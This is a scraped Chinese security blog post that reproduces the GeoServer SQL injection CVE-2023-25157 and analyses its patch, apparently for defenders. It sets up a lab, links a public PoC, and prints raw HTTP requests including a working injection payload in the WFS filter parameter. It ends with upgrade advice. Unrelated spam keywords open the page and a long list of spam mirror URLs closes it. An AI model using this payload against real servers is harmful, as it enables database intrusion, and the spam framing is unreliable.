上海团购网站建设,yahoo网站提交,店铺怎么做推广和宣传,门户网站建设必要性原创稿件征集 邮箱#xff1a;eduantvsion.com QQ#xff1a;3200599554 黑客与极客相关#xff0c;互联网安全领域里 的热点话题 漏洞、技术相关的调查或分析 稿件通过并发布还能收获 200-800元不等的稿酬 更多详情#xff0c;点我查看#xff01; 简介 GeoServer是一个开… 原创稿件征集 邮箱eduantvsion.com QQ3200599554 黑客与极客相关互联网安全领域里 的热点话题 漏洞、技术相关的调查或分析 稿件通过并发布还能收获 200-800元不等的稿酬 更多详情点我查看 简介 GeoServer是一个开源的地图服务器它是遵循OpenGIS Web服务器规范的J2EE实现通过它可以方便的将地图数据发布为地图服务实现地理空间数据在用户之间的共享。 影响版本 geoserver2.18.7 2.19.0geoserver2.19.7 2.20.0geoserver2.20.7 2.21.0geoserver2.21.4 2.22.0geoserver2.22.2 环境搭建 安装方式有多种可以选择 • windwos下载安装 https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.0/GeoServer-2.22.0-winsetup.exe/download 下载后只需要指定端口直接下载可完成安装 • war包安装 tomcat下载地址 https://dlcdn.apache.org/tomcat/tomcat-8/v8.5.90/bin/apache-tomcat-8.5.90-windows-x64.zip geoserver下载地址 https://sourceforge.net/projects/geoserver/files/GeoServer/2.23.1/geoserver-2.23.1-war.zip • 解压下载后的文件geoserver-2.15.1-war.zip得到geoserver.war• 把此geoserver.war文件拷贝到tomcat根目录下的webapps文件夹下。• 启动tomcat 访问路径默认端口为8080端口根据自己的需求开放即可这里我开放的端口为8081 http://localhost:8081/geoserver/web/ 分析 POC下载链接 https://github.com/win3zz/CVE-2023-25157 python3 CVE-2023-25157.py http://localhost:8081 查看提交的补丁分析一下漏洞 https://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d 修改了配置文件src/community/jdbcconfig/src/main/java/org/geoserver/jdbcconfig/internal/ConfigDatabase.java 重新添加了模块org.geoserver.jdbcloader.JDBCLoaderProperties模块用于配置文件jdbcconfig/jdbcconfig.properties中的 JDBCConfig 模块 属性字段并更改了构造函数以包含此属性字段。这允许对数据库配置进行更多自定义从而可能允许增强安全措施。NamedParameterJdbcTemplate是 Spring Framework 提供的一个类它添加了对使用命名参数对 JDBC 语句进行编程的支持而不是使用经典占位符 (?) 参数对 JDBC 语句进行编程 public ConfigDatabase(JDBCLoaderProperties properties,DataSource dataSource,XStreamInfoSerialBinding binding) {this(properties, dataSource, binding, null);}public ConfigDatabase(JDBCLoaderProperties properties,final DataSource dataSource,final XStreamInfoSerialBinding binding,CacheProvider cacheProvider) {this.properties properties;this.binding binding;this.template new NamedParameterJdbcTemplate(dataSource); 通过使用参数化查询而不是字符串连接 src/community/jdbcconfig/src/main/java/org/geoserver/jdbcconfig/internal/OracleDialect.java在插入中做了修改 //sql.insert(0, SELECT * FROM (SELECT query.*, rownum rnum FROM (\n);//sql.append() query\n);sql.insert(0,SELECT * FROM (SELECT query.*, rownum rnum FROM ( (isDebugMode() ? \n : ));sql.append() query);appendIfDebug(sql, \n, ); 修改了插入语法其方法在src/community/jdbcconfig/src/main/java/org/geoserver/jdbcconfig/internal/Dialect.java 中定义 public boolean isDebugMode() {return debugMode;}public void setDebugMode(boolean debugMode) {this.debugMode debugMode;}/** Escapes the contents of the SQL comment to prevent SQL injection. */public String escapeComment(String comment) {String escaped ESCAPE_CLOSING_COMMENT_PATTERN.matcher(comment).replaceAll(*\\\\/);return ESCAPE_OPENING_COMMENT_PATTERN.matcher(escaped).replaceAll(/\\\\*);}/** Appends the objects to the SQL in a comment if debug mode is enabled. */public StringBuilder appendComment(StringBuilder sql, Object... objects) {if (!debugMode) {return sql;}sql.append( /* );for (Object object : objects) {sql.append(escapeComment(String.valueOf(object)));}return sql.append( */\n);}/** Appends the objects to the SQL in an comment if debug mode is enabled. */public StringBuilder appendComment(Object sql, Object... objects) {return appendComment((StringBuilder) sql, objects);}/** Appends one of the strings to the SQL depending on whether debug mode is enabled. */public StringBuilder appendIfDebug(StringBuilder sql, String ifEnabled, String ifDisabled) {return sql.append(debugMode ? ifEnabled : ifDisabled);} 获取功能名POC GET /geoserver/ows?serviceWFSversion1.0.0requestGetCapabilities HTTP/1.1
Host: 10.10.12.35:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONIDnode0iyysq0tt08lup1gy571ox3id1.node0
Upgrade-Insecure-Requests: 1 获取功能属性POC GET /geoserver/ows?servicewfsversion1.0.0requestGetFeaturetypeNamene:coastlinesmaxFeatures1outputFormatjson HTTP/1.1
Host: 10.10.12.35:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONIDnode0iyysq0tt08lup1gy571ox3id1.node0
Upgrade-Insecure-Requests: 1 构造恶意payload GET /geoserver/ows?servicewfsversion1.0.0requestGetFeaturetypeNamene:coastlinesstrStartsWith%28scalerank%2C%27x%27%27%29%3Dtrueand1%3D%28SELECTCAST%28%28SELECTversion()%29ASINTEGER%29%29--%27%29%3Dtrue HTTP/1.1
Host: 10.10.12.35:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONIDnode0iyysq0tt08lup1gy571ox3id1.node0
Upgrade-Insecure-Requests: 1 这里引用一张图geotools的注入漏洞 漏洞编号CVE-2023-25158,查看补丁发现 在类中添加该escapeBackslash字段modules/library/jdbc/src/main/java/org/geotools/data/jdbc/FilterToSQL.java是一种预防措施可防止某些形式的 SQL 注入其中反斜杠字符用于转义 SQL 语法中的特殊字符 // single quotes must be escaped to have a valid sql stringString escaped escapeLiteral(encoding); 调用类escapeLiteral()中的方法EscapeSql.java。此方法旨在不仅转义单引号还转义反斜杠并可能根据其参数转义双引号 public static String escapeLiteral(String literal, boolean escapeBackslash, boolean escapeDoubleQuote) {// -- String escaped SINGLE_QUOTE_PATTERN.matcher(literal).replaceAll();if (escapeBackslash) {// \ -- \\escaped BACKSLASH_PATTERN.matcher(escaped).replaceAll(\\\\\\\\);}if (escapeDoubleQuote) {// -- \escaped DOUBLE_QUOTE_PATTERN.matcher(escaped).replaceAll(\\\\\);}return escaped; 至于为什么会聊到CVE-2023-25158,这里就要聊到Geoserver和Geotools的关系了,可以参考这篇文章 https://blog.csdn.net/nmj2008/article/details/113869086 修复方案 • 升级安全版本目前已经有最新版本。 参考链接 https://github.com/0x2458bughunt/CVE-2023-25157https://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d#diff-ad9c7486badfa75fbc4945fec56a8bb870a983363eb1f8c8fa39fc69589a6593https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158https://github.com/geotools/geotools/commit/64fb4c47f43ca818c2fe96a94651bff1b3b3ed2b#diff-9c2f3a1daafd589eb6305170ffa40db051aeda5ae26c22b3438ba5923b451ab7https://blog.csdn.net/nmj2008/article/details/113869086 原创稿件征集 征集原创技术文章中欢迎投递 投稿邮箱eduantvsion.com 文章类型黑客极客技术、信息安全热点安全研究分析等安全相关 通过审核并发布能收获200-800元不等的稿酬。 更多详情点我查看 九周年庆戳“阅读原文“
文章转载自: http://www.morning.nynyj.cn.gov.cn.nynyj.cn http://www.morning.wlggr.cn.gov.cn.wlggr.cn http://www.morning.zwtp.cn.gov.cn.zwtp.cn http://www.morning.smxyw.cn.gov.cn.smxyw.cn http://www.morning.wkqrp.cn.gov.cn.wkqrp.cn http://www.morning.qjlnh.cn.gov.cn.qjlnh.cn http://www.morning.cokcb.cn.gov.cn.cokcb.cn http://www.morning.sblgt.cn.gov.cn.sblgt.cn http://www.morning.ntqnt.cn.gov.cn.ntqnt.cn http://www.morning.rhkgz.cn.gov.cn.rhkgz.cn http://www.morning.lxmks.cn.gov.cn.lxmks.cn http://www.morning.rykn.cn.gov.cn.rykn.cn http://www.morning.gnjkn.cn.gov.cn.gnjkn.cn http://www.morning.jcfdk.cn.gov.cn.jcfdk.cn http://www.morning.tfpbm.cn.gov.cn.tfpbm.cn http://www.morning.tralution.cn.gov.cn.tralution.cn http://www.morning.dgmjm.cn.gov.cn.dgmjm.cn http://www.morning.mjtgt.cn.gov.cn.mjtgt.cn http://www.morning.bmsqq.cn.gov.cn.bmsqq.cn http://www.morning.gbcnz.cn.gov.cn.gbcnz.cn http://www.morning.trjdr.cn.gov.cn.trjdr.cn http://www.morning.dsncg.cn.gov.cn.dsncg.cn http://www.morning.nfpct.cn.gov.cn.nfpct.cn http://www.morning.crkmm.cn.gov.cn.crkmm.cn http://www.morning.rglzy.cn.gov.cn.rglzy.cn http://www.morning.tjsxx.cn.gov.cn.tjsxx.cn http://www.morning.fcrw.cn.gov.cn.fcrw.cn http://www.morning.rfrxt.cn.gov.cn.rfrxt.cn http://www.morning.ctrkh.cn.gov.cn.ctrkh.cn http://www.morning.ztcwp.cn.gov.cn.ztcwp.cn http://www.morning.xsszn.cn.gov.cn.xsszn.cn http://www.morning.qhvah.cn.gov.cn.qhvah.cn http://www.morning.wsyst.cn.gov.cn.wsyst.cn http://www.morning.tsycr.cn.gov.cn.tsycr.cn http://www.morning.frpfk.cn.gov.cn.frpfk.cn http://www.morning.pangucheng.cn.gov.cn.pangucheng.cn http://www.morning.phlrp.cn.gov.cn.phlrp.cn http://www.morning.wlfxn.cn.gov.cn.wlfxn.cn http://www.morning.wjwfj.cn.gov.cn.wjwfj.cn http://www.morning.xmwdt.cn.gov.cn.xmwdt.cn http://www.morning.yngtl.cn.gov.cn.yngtl.cn http://www.morning.kpfds.cn.gov.cn.kpfds.cn http://www.morning.wjjxr.cn.gov.cn.wjjxr.cn http://www.morning.c7513.cn.gov.cn.c7513.cn http://www.morning.aishuxue.com.cn.gov.cn.aishuxue.com.cn http://www.morning.frsxt.cn.gov.cn.frsxt.cn http://www.morning.gwhjy.cn.gov.cn.gwhjy.cn http://www.morning.lrprj.cn.gov.cn.lrprj.cn http://www.morning.nmnhs.cn.gov.cn.nmnhs.cn http://www.morning.pmdzd.cn.gov.cn.pmdzd.cn http://www.morning.brwei.com.gov.cn.brwei.com http://www.morning.lskrg.cn.gov.cn.lskrg.cn http://www.morning.gmrxh.cn.gov.cn.gmrxh.cn http://www.morning.qnhcx.cn.gov.cn.qnhcx.cn http://www.morning.wnxqf.cn.gov.cn.wnxqf.cn http://www.morning.spxsm.cn.gov.cn.spxsm.cn http://www.morning.wlnr.cn.gov.cn.wlnr.cn http://www.morning.prfrb.cn.gov.cn.prfrb.cn http://www.morning.zqzzn.cn.gov.cn.zqzzn.cn http://www.morning.fqljq.cn.gov.cn.fqljq.cn http://www.morning.jstggt.cn.gov.cn.jstggt.cn http://www.morning.mczjq.cn.gov.cn.mczjq.cn http://www.morning.wyrkp.cn.gov.cn.wyrkp.cn http://www.morning.bybhj.cn.gov.cn.bybhj.cn http://www.morning.jkdtz.cn.gov.cn.jkdtz.cn http://www.morning.zwgbz.cn.gov.cn.zwgbz.cn http://www.morning.rknsp.cn.gov.cn.rknsp.cn http://www.morning.rbsxf.cn.gov.cn.rbsxf.cn http://www.morning.pshtf.cn.gov.cn.pshtf.cn http://www.morning.rbsxf.cn.gov.cn.rbsxf.cn http://www.morning.dxxnq.cn.gov.cn.dxxnq.cn http://www.morning.cthrb.cn.gov.cn.cthrb.cn http://www.morning.njpny.cn.gov.cn.njpny.cn http://www.morning.rxsgk.cn.gov.cn.rxsgk.cn http://www.morning.dxhdn.cn.gov.cn.dxhdn.cn http://www.morning.hybmz.cn.gov.cn.hybmz.cn http://www.morning.btmwd.cn.gov.cn.btmwd.cn http://www.morning.xpfwr.cn.gov.cn.xpfwr.cn http://www.morning.jcwhk.cn.gov.cn.jcwhk.cn http://www.morning.qjtbt.cn.gov.cn.qjtbt.cn
